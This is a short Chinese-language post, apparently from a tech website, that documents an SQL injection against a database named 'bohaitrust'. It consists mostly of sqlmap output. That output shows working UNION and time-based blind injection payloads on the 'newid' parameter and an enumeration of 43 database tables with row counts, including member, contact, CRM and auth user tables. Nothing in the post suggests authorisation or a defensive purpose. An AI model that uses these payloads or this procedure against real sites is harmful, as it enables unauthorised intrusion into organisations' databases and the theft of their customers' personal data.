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2018年01月31日  | 移动技术网网络运营  | 我要评论


#1 网址


#2 注入点


#3 证明

Parameter: newid (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: newid=-3925) UNION ALL SELECT CONCAT(0x716a786b71,0x76555175746650765465,0x7170767671)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: newid=107) AND SLEEP(5) AND (2974=2974
[22:46:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[22:46:32] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[22:46:32] [INFO] fetching tables for database: 'bohaitrust'
[22:46:32] [INFO] the SQL query used returns 45 entries
Database: bohaitrust                                                                                                                         
| Table                   | Entries |
| ystar_vote_result       | 1391    |
| ystar_netvalue          | 486     |
| ystar_netvalue_old1231  | 447     |
| ystar_message           | 375     |
| ystar_article_content   | 304     |
| ystar_article           | 303     |
| ystar_document          | 297     |
| ystar_product_crm       | 269     |
| ystar_contact_bak0129   | 252     |
| ystar_contact           | 251     |
| ystar_product2          | 228     |
| ystar_product           | 191     |
| ystar_member            | 188     |
| ystar_product_bak0123   | 178     |
| ystar_product_bak0108   | 174     |
| ystar_auth_menu         | 147     |
| ystar_auth_rule         | 147     |
| ystar_journals_article  | 121     |
| ystar_journals_channel  | 61      |
| ystar_document_cate     | 54      |
| ystar_channel           | 44      |
| ystar_config_bak1202    | 44      |
| ystar_config            | 43      |
| ystar_vote_body         | 24      |
| ystar_member_sell       | 20      |
| ystar_journals_email    | 18      |
| ystar_member_apply      | 14      |
| ystar_advert            | 10      |
| ystar_auth_group_access | 10      |
| ystar_auth_user         | 10      |
| ystar_guestbook         | 8       |
| ystar_journals          | 8       |
| ystar_vote_subject      | 8       |
| ystar_auth_group        | 7       |
| ystar_gift              | 7       |
| ystar_member_lsdz       | 7       |
| ystar_advert_position   | 6       |
| ystar_apply_member      | 6       |
| ystar_product_log       | 6       |
| ystar_product_doc       | 4       |
| ystar_gift_cate         | 2       |
| ystar_memberneed_log    | 2       |
| ystar_product_zr        | 2       |




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